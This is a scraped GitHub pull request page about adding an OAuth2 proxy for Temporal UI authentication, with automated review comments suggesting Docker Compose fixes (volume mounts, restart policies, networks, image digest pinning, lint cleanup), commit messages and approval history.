2-6: 🛠️ Refactor suggestion

Mount the n8n_data volume and add resilience.
You've declared the n8n_data volume but not mounting it in the n8n service. Also consider adding a restart policy and network membership:
 services:
   n8n:
+    restart: unless-stopped
     environment:
       - WEBHOOK_URL=${N8N_WEBHOOK_URL:?N8N_WEBHOOK_URL is required}
       - N8N_ENCRYPTION_KEY=${N8N_ENCRYPTION_KEY:?N8N_ENCRYPTION_KEY is required}
       - N8N_HOST=n8n.speedandfunction.com
+    volumes:
+      - n8n_data:/home/node/.n8n
+    networks:
+      - app-network

🧹 Nitpick comments (5)

docker-compose.prod.yml (5)
1-1: Add a Compose version declaration.
It's best practice to specify a top-level version field (e.g., "3.8") to ensure consistent behavior and compatibility across environments.

17-20: Add a restart policy and network to temporal.
For production resilience and inter-service communication, attach temporal to the network and set a restart policy:
 temporal:
+    restart: unless-stopped
     environment:
       - TEMPORAL_PORT=${TEMPORAL_PORT:?TEMPORAL_PORT is required}
+    networks:
+      - app-network
21-24: Attach temporal-ui to the shared network and add a restart policy.
Since oauth2-proxy depends on temporal-ui via app-network, ensure temporal-ui also sits on that network and recovers on failure:
 temporal-ui:
+    restart: unless-stopped
     environment:
       - TEMPORAL_UI_PORT=${TEMPORAL_UI_PORT:?TEMPORAL_UI_PORT is required}
     ports: []
+    networks:
+      - app-network
28-29: Pin the OAuth2 Proxy image to a digest.
For stronger reproducibility and supply-chain security, pin the image tag to a specific digest:
-    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    image: quay.io/oauth2-proxy/oauth2-proxy@sha256:<digest-of-v7.8.0>
10-10: Remove trailing whitespace and ensure newline at end-of-file.
YAMLlint flagged trailing spaces on several lines, and the file lacks a final newline. Cleaning these up will prevent lint errors and improve readability.

Also applies to: 41-44, 52-52, 60-60, 67-70, 100-100

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 10-10: trailing spaces

(trailing-spaces)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 5697b99 and ccbfd4e.

📒 Files selected for processing (1)

docker-compose.prod.yml (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[error] 10-10: trailing spaces

(trailing-spaces)

[error] 41-41: trailing spaces

(trailing-spaces)

[error] 44-44: trailing spaces

(trailing-spaces)

[error] 52-52: trailing spaces

(trailing-spaces)

[error] 60-60: trailing spaces

(trailing-spaces)

[error] 67-67: trailing spaces

(trailing-spaces)

[error] 70-70: trailing spaces

(trailing-spaces)

[error] 100-100: no new line character at the end of file

(new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (1)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)

🔇 Additional comments (1)

docker-compose.prod.yml (1)

26-34: Verify OAuth2 Proxy environment variable names.
Confirm that OAUTH2_PROXY_COOKIE_DOMAINS, OAUTH2_PROXY_WHITELIST_DOMAINS, and related settings align with the v7.8.0 flags (e.g., --cookie-domain, --whitelist-domain) and that the plural forms are supported.

Configured the temporal-ui service in docker-compose.prod.yml to expose port 8081, allowing access to the service on the specified port. This change enhances service accessibility in the production environment.

coderabbitai

Actionable comments posted: 0

♻️ Duplicate comments (5)

docker-compose.prod.yml (5)
1-2: Duplicate: Add Docker Compose version declaration
It's best practice to specify the Compose file version (version: "3.8") at the top to ensure consistent behavior across different Docker Compose installations.

Apply this diff:
+version: "3.8"
 services:
2-6: ⚠️ Potential issue

Mount n8n_data volume for persistence
The n8n_data volume is declared later but never mounted in the n8n service. Without this mount, workflows and credentials in n8n will be lost upon container restart.

Apply this diff:
 services:
   n8n:
     environment:
       - WEBHOOK_URL=${N8N_WEBHOOK_URL:?N8N_WEBHOOK_URL is required}
       - N8N_ENCRYPTION_KEY=${N8N_ENCRYPTION_KEY:?N8N_ENCRYPTION_KEY is required}
       - N8N_HOST=n8n.speedandfunction.com
+    volumes:
+      - n8n_data:/home/node/.n8n
27-82: ⚠️ Potential issue

Declare root-level app-network
The oauth2-proxy service is attached to app-network, but there’s no corresponding top-level networks: block. Docker Compose will fail to start the proxy without an explicit declaration.

Add this at the bottom (after volumes:):
 volumes:
   n8n_data:
     …
   postgresql-data:
     …
+networks:
+  app-network:
+    external: false
🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 45-45: trailing spaces

(trailing-spaces)

[error] 53-53: trailing spaces

(trailing-spaces)

[error] 61-61: trailing spaces

(trailing-spaces)

[error] 68-68: trailing spaces

(trailing-spaces)

[error] 71-71: trailing spaces

(trailing-spaces)

7-10: ⚠️ Potential issue

Mount opensearch-data volume and add a restart policy
The opensearch-data volume is defined but not mounted in the opensearch service, so indices won’t persist. Adding a restart policy also increases resilience.

Apply this diff:
   opensearch:
     environment:
       - OPENSEARCH_PORT=${OPENSEARCH_PORT:?OPENSEARCH_PORT is required}
+    restart: unless-stopped
+    volumes:
+      - opensearch-data:/usr/share/opensearch/data
🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 10-10: trailing spaces

(trailing-spaces)

11-16: ⚠️ Potential issue

Mount postgresql-data volume and add a restart policy
The postgresql-data volume is declared but never mounted, which makes the database ephemeral on container recreation. A restart policy will also ensure automatic recovery.

Apply this diff:
   postgresql:
     environment:
       - POSTGRES_USER=${POSTGRES_USER:?POSTGRES_USER is required}
       - POSTGRES_PASSWORD=${POSTGRES_PASSWORD:?POSTGRES_PASSWORD is required}
       - POSTGRES_DB=${POSTGRES_DB:?POSTGRES_DB is required}
+    restart: unless-stopped
+    volumes:
+      - postgresql-data:/var/lib/postgresql/data

🧹 Nitpick comments (2)

docker-compose.prod.yml (2)
10-10: Remove trailing whitespace
YAML lint reports trailing spaces on several lines, which can lead to parsing warnings. Please strip trailing spaces on the indicated lines.

Example diff (illustrative for one line):
-      - OAUTH2_PROXY_HTTP_ADDRESS=0.0.0.0:8080  
+      - OAUTH2_PROXY_HTTP_ADDRESS=0.0.0.0:8080
Also applies to: 42-42, 45-45, 53-53, 61-61, 68-68, 71-71

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 10-10: trailing spaces

(trailing-spaces)

101-101: Add newline at end of file
Ensure there’s a single newline character after the last line to satisfy POSIX standards and avoid lint errors.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 101-101: no new line character at the end of file

(new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between ccbfd4e and 4c8993b.

📒 Files selected for processing (1)

docker-compose.prod.yml (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[error] 10-10: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 45-45: trailing spaces

(trailing-spaces)

[error] 53-53: trailing spaces

(trailing-spaces)

[error] 61-61: trailing spaces

(trailing-spaces)

[error] 68-68: trailing spaces

(trailing-spaces)

[error] 71-71: trailing spaces

(trailing-spaces)

[error] 101-101: no new line character at the end of file

(new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (1)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)

Removed the port mapping for the temporal-ui service in docker-compose.prod.yml, ensuring a clean configuration without hardcoded values. This change aligns with the current service setup and enhances flexibility in port management.

coderabbitai

Actionable comments posted: 2

♻️ Duplicate comments (4)

docker-compose.prod.yml (4)
79-81: ⚠️ Potential issue

Declare the app-network at the root level
The oauth2-proxy service attaches to app-network, but there’s no corresponding networks: block, causing Compose failures.
 volumes:
   n8n_data:
     driver: local
     driver_opts:
       type: none
       o: bind
       device: /data/n8n
+networks:
+  app-network:
+    external: false
Shall I add this at the end of the file?

7-9: ⚠️ Potential issue

Persist and scope the OpenSearch service
The opensearch service defines the opensearch-data volume but never mounts it. It also needs a restart policy and network attachment to be production-ready.
   opensearch:
+    restart: unless-stopped
+    volumes:
+      - opensearch-data:/usr/share/opensearch/data
+    networks:
+      - app-network
     environment:
       - OPENSEARCH_PORT=${OPENSEARCH_PORT:?OPENSEARCH_PORT is required}
Would you like me to generate the full service snippet?

11-15: ⚠️ Potential issue

Enable persistence for PostgreSQL
The postgresql-data volume is declared but not mounted. Add a restart policy and network assignment to ensure data durability and connectivity.
   postgresql:
+    restart: unless-stopped
+    volumes:
+      - postgresql-data:/var/lib/postgresql/data
+    networks:
+      - app-network
     environment:
       - POSTGRES_USER=${POSTGRES_USER:?POSTGRES_USER is required}
       - POSTGRES_PASSWORD=${POSTGRES_PASSWORD:?POSTGRES_PASSWORD is required}
       - POSTGRES_DB=${POSTGRES_DB:?POSTGRES_DB is required}
Happy to help integrate this if needed.

1-6: ⚠️ Potential issue

Ensure n8n service resilience and persistence
The n8n service currently lacks a restart policy, network scoping, and the volume mount for the n8n_data volume. Without these, failures won’t self-recover, and workflows/credentials won’t persist.

Apply this diff to address it:
 services:
   n8n:
+    restart: unless-stopped
+    networks:
+      - app-network
     environment:
       - WEBHOOK_URL=${N8N_WEBHOOK_URL:?N8N_WEBHOOK_URL is required}
       - N8N_ENCRYPTION_KEY=${N8N_ENCRYPTION_KEY:?N8N_ENCRYPTION_KEY is required}
       - N8N_HOST=n8n.speedandfunction.com
+    volumes:
+      - n8n_data:/home/node/.n8n
Let me know if you’d like me to expand this across all services or file an issue for tracking persistence enhancements.

🧹 Nitpick comments (2)

docker-compose.prod.yml (2)
26-35: Pin the OAuth2 Proxy image to an immutable digest
Using a mutable tag (v7.8.0) introduces supply-chain risk. It’s best practice to reference a specific SHA256 digest.
-    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    image: quay.io/oauth2-proxy/oauth2-proxy@sha256:<digest-of-v7.8.0>
I can help you look up the correct digest or automate this pinning.

10-10: Remove trailing spaces and add a newline at end-of-file
Several lines have trailing whitespace, and the file is missing a final newline. Cleaning this up will satisfy YAML linting rules.

Please strip the trailing spaces on the noted lines and ensure the file ends with a single newline.

Also applies to: 41-41, 44-44, 52-52, 60-60, 67-67, 70-70, 100-100

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 10-10: trailing spaces

(trailing-spaces)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 4c8993b and 6a19e0e.

📒 Files selected for processing (1)

docker-compose.prod.yml (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[error] 10-10: trailing spaces

(trailing-spaces)

[error] 41-41: trailing spaces

(trailing-spaces)

[error] 44-44: trailing spaces

(trailing-spaces)

[error] 52-52: trailing spaces

(trailing-spaces)

[error] 60-60: trailing spaces

(trailing-spaces)

[error] 67-67: trailing spaces

(trailing-spaces)

[error] 70-70: trailing spaces

(trailing-spaces)

[error] 100-100: no new line character at the end of file

(new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (1)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)

coderabbitai

Actionable comments posted: 0

♻️ Duplicate comments (1)

docker-compose.prod.yml (1)
79-81: ⚠️ Potential issue

Define and attach services to the app-network
The oauth2-proxy service is connected to app-network, but:

There’s no root-level networks: declaration for app-network, causing Compose to error.

The target temporal-ui (and temporal) aren’t part of app-network, so the proxy cannot forward traffic.

Apply these diffs:
--- a/docker-compose.prod.yml
+++ b/docker-compose.prod.yml
@@ volumes:
   postgresql-data:
@@
+networks:
+  app-network:
+    external: false

@@ services:
   temporal-ui:
+    networks:
+      - app-network

   temporal:
+    networks:
+      - app-network

🧹 Nitpick comments (3)

docker-compose.prod.yml (3)
26-35: Pin the OAuth2 Proxy image to a digest for supply-chain security
Relying on a mutable image tag (v7.8.0) can introduce supply-chain risks and makes deployments harder to reproduce.
Apply this diff to pin the image:
-    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    image: quay.io/oauth2-proxy/oauth2-proxy@sha256:<digest-of-v7.8.0>
41-70: Remove trailing spaces on blank lines
Static analysis detected trailing spaces on several blank lines within the environment section. Cleaning these up improves maintainability and silences YAML lint warnings.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 41-41: trailing spaces

(trailing-spaces)

[error] 44-44: trailing spaces

(trailing-spaces)

[error] 52-52: trailing spaces

(trailing-spaces)

[error] 60-60: trailing spaces

(trailing-spaces)

[error] 67-67: trailing spaces

(trailing-spaces)

[error] 70-70: trailing spaces

(trailing-spaces)

73-77: Harden the healthcheck command
Using wget may not be available in all environments and can obscure failures. Consider switching to curl with Docker’s CMD-SHELL form for clearer semantics:
-      test: ["CMD", "wget", "-O", "/dev/null", "-q", "http://localhost:8080/oauth2/health"]
+      test: ["CMD-SHELL", "curl -f http://localhost:8080/oauth2/health || exit 1"]

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6a19e0e and c4f8502.

📒 Files selected for processing (3)

README.md (1 hunks)
docker-compose.prod.yml (1 hunks)
docker-compose.yml (2 hunks)

🚧 Files skipped from review as they are similar to previous changes (2)

README.md
docker-compose.yml

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[error] 41-41: trailing spaces

(trailing-spaces)

[error] 44-44: trailing spaces

(trailing-spaces)

[error] 52-52: trailing spaces

(trailing-spaces)

[error] 60-60: trailing spaces

(trailing-spaces)

[error] 67-67: trailing spaces

(trailing-spaces)

[error] 70-70: trailing spaces

(trailing-spaces)

⏰ Context from checks skipped due to timeout of 90000ms (2)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
GitHub Check: Service Availability Check

🔇 Additional comments (1)

docker-compose.prod.yml (1)

23-25: Intentional removal of ports mapping for temporal-ui
Resetting the ports section prevents the UI from being exposed directly on the host, ensuring that only the OAuth2 proxy can route external traffic. Confirm that internal routing to temporal-ui:8080 still functions as expected.

Added a note to the OAuth2 Proxy setup guide instructing users to adjust domain values to match their deployment environment.

Added a comprehensive Table of Contents to the top of the README for improved navigation and usability. This includes quick links to all major sections and documentation references.

coderabbitai

Actionable comments posted: 1

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 248788e and b0afa64.

📒 Files selected for processing (1)

README.md (2 hunks)

🧰 Additional context used

🪛 markdownlint-cli2 (0.17.2)

README.md

19-19: Link fragments should be valid
null

(MD051, link-fragments)

⏰ Context from checks skipped due to timeout of 90000ms (2)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
GitHub Check: Service Availability Check

🔇 Additional comments (3)

README.md (3)

3-4: Well done adding a Table of Contents.
This new “## Table of Contents” section will greatly improve navigation for readers.

5-18: All internal TOC links look correct.
Each anchor from Services through GitHub MCP Configuration corresponds to an existing heading in this README.

172-172: Correctly updated Service Ports to reflect OAuth2 Proxy.
Updating “Temporal UI” to “Temporal UI / OAuth2 Proxy” clarifies that the proxy now front-ends the UI on port 8080.

Changed "Documentation" from a link to a plain section in the table of contents for improved clarity and consistency

sonarqubecloud · 2025-04-29T12:32:52Z

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

killev

LGTM.

coderabbitai Bot reviewed Apr 25, 2025

View reviewed changes

Comment thread docs/oauth2-proxy.md Outdated

Comment thread docs/oauth2-proxy.md Outdated

anatolyshipitz and others added 2 commits April 25, 2025 20:06

Merge branch 'main' into feature/64524-temporal-ui-google-auth

b4fe0d2

coderabbitai Bot reviewed Apr 26, 2025

View reviewed changes

Comment thread docker-compose.prod.yml Outdated

Comment thread docker-compose.prod.yml

coderabbitai Bot reviewed Apr 26, 2025

View reviewed changes

Comment thread docker-compose.prod.yml Outdated

Comment thread docker-compose.prod.yml Outdated

Comment thread docker-compose.prod.yml Outdated

fix(oauth2-proxy): update redirect URL for production configuration

1891edc

Changed the OAUTH2_PROXY_REDIRECT_URL to use the correct domain temporal.speedandfunction.com for OAuth2 callback in the production docker-compose file.

coderabbitai Bot reviewed Apr 26, 2025

View reviewed changes

fix(oauth2-proxy): update upstream port for production configuration

e9f7ae4

Changed the OAUTH2_PROXY_UPSTREAMS from port 80 to 8080 in the production docker-compose file to align with the updated service configuration.

coderabbitai Bot reviewed Apr 26, 2025

View reviewed changes

fix(oauth2-proxy): correct sign-out URL in production configuration

2f3f07b

Updated the OAUTH2_PROXY_SIGN_OUT_URL to use the correct domain temporal.speedandfunction.com in the production docker-compose file.

coderabbitai Bot reviewed Apr 26, 2025

View reviewed changes

Comment thread docker-compose.prod.yml

coderabbitai Bot reviewed Apr 26, 2025

View reviewed changes

Comment thread docker-compose.prod.yml Outdated

coderabbitai Bot reviewed Apr 26, 2025

View reviewed changes

Comment thread docker-compose.prod.yml Outdated

Comment thread docker-compose.prod.yml

anatolyshipitz added 2 commits April 26, 2025 20:56

coderabbitai Bot reviewed Apr 26, 2025

View reviewed changes

Comment thread docker-compose.prod.yml Outdated

coderabbitai Bot reviewed Apr 26, 2025

View reviewed changes

Comment thread docker-compose.prod.yml Outdated

Comment thread docker-compose.prod.yml

anatolyshipitz changed the title ~~feat: implement OAuth2 proxy documentation for Temporal UI authentica…~~ feat: implement OAuth2 proxy for Temporal UI authentication Apr 26, 2025

anatolyshipitz added 2 commits April 27, 2025 22:30

coderabbitai Bot reviewed Apr 27, 2025

View reviewed changes

killev requested changes Apr 28, 2025

View reviewed changes

Comment thread README.md Outdated

Comment thread README.md Outdated

Comment thread docker-compose.yml Outdated

Comment thread docker-compose.yml Outdated

Comment thread docker-compose.prod.yml

anatolyshipitz added 2 commits April 28, 2025 10:33

coderabbitai Bot reviewed Apr 28, 2025

View reviewed changes

Comment thread docker-compose.prod.yml Outdated

Comment thread docker-compose.prod.yml

Comment thread docker-compose.prod.yml

fix(docker-compose): remove DISABLE_SECURITY_PLUGIN from opensearch s…

ccbfd4e

…ervice configuration Eliminated the DISABLE_SECURITY_PLUGIN environment variable from the opensearch service in docker-compose.prod.yml, streamlining the configuration and enhancing security practices.

coderabbitai Bot reviewed Apr 28, 2025

View reviewed changes

Comment thread docker-compose.prod.yml Outdated

Comment thread docker-compose.prod.yml Outdated

Comment thread docker-compose.prod.yml

fix(docker-compose): add port mapping for temporal-ui service

4c8993b

Configured the temporal-ui service in docker-compose.prod.yml to expose port 8081, allowing access to the service on the specified port. This change enhances service accessibility in the production environment.

coderabbitai Bot reviewed Apr 28, 2025

View reviewed changes

Comment thread docker-compose.prod.yml

Comment thread docker-compose.prod.yml

DenisChistyakov previously approved these changes Apr 28, 2025

View reviewed changes

Merge branch 'main' into feature/64524-temporal-ui-google-auth

c4f8502

anatolyshipitz dismissed DenisChistyakov’s stale review via c4f8502 April 28, 2025 17:24

coderabbitai Bot reviewed Apr 28, 2025

View reviewed changes

feat(docs): update OAuth2 Proxy guide with domain adjustment note

b81485e

Added a note to the OAuth2 Proxy setup guide instructing users to adjust domain values to match their deployment environment.

anatolyshipitz requested a review from killev April 29, 2025 06:30

killev requested changes Apr 29, 2025

View reviewed changes

Comment thread README.md Outdated

Comment thread docker-compose.prod.yml

Comment thread README.md

anatolyshipitz added 2 commits April 29, 2025 14:13

docs(readme): add detailed table of contents

248788e

Added a comprehensive Table of Contents to the top of the README for improved navigation and usability. This includes quick links to all major sections and documentation references.

docs(readme): update README with fix OAuth2 Proxy typo

b0afa64

coderabbitai Bot reviewed Apr 29, 2025

View reviewed changes

Comment thread README.md Outdated

chore(docs): fix table of contents formatting for documentation section

c69f062

Changed "Documentation" from a link to a plain section in the table of contents for improved clarity and consistency

anatolyshipitz requested a review from killev April 29, 2025 12:35

killev approved these changes Apr 29, 2025

View reviewed changes

anatolyshipitz merged commit 5b88888 into main Apr 29, 2025
11 checks passed

anatolyshipitz deleted the feature/64524-temporal-ui-google-auth branch April 29, 2025 12:54

Conversation

anatolyshipitz commented Apr 25, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

coderabbitai Bot commented Apr 25, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Walkthrough

Changes

Sequence Diagram(s)

Suggested reviewers

Chat

CodeRabbit Commands (Invoked using PR comments)

Other keywords and placeholders

CodeRabbit Configuration File (.coderabbit.yaml)

Documentation and Community

Uh oh!

github-actions Bot commented Apr 25, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

🔍 Vulnerabilities of n8n-test:latest

Summary

Details

PoC

Impact

Impact

Patches

Workarounds

References

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Uh oh!

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

anatolyshipitz commented Apr 25, 2025 •

edited

Loading

coderabbitai Bot commented Apr 25, 2025 •

edited

Loading

CodeRabbit Configuration File (`.coderabbit.yaml`)

github-actions Bot commented Apr 25, 2025 •

edited

Loading

🔍 Vulnerabilities of `n8n-test:latest`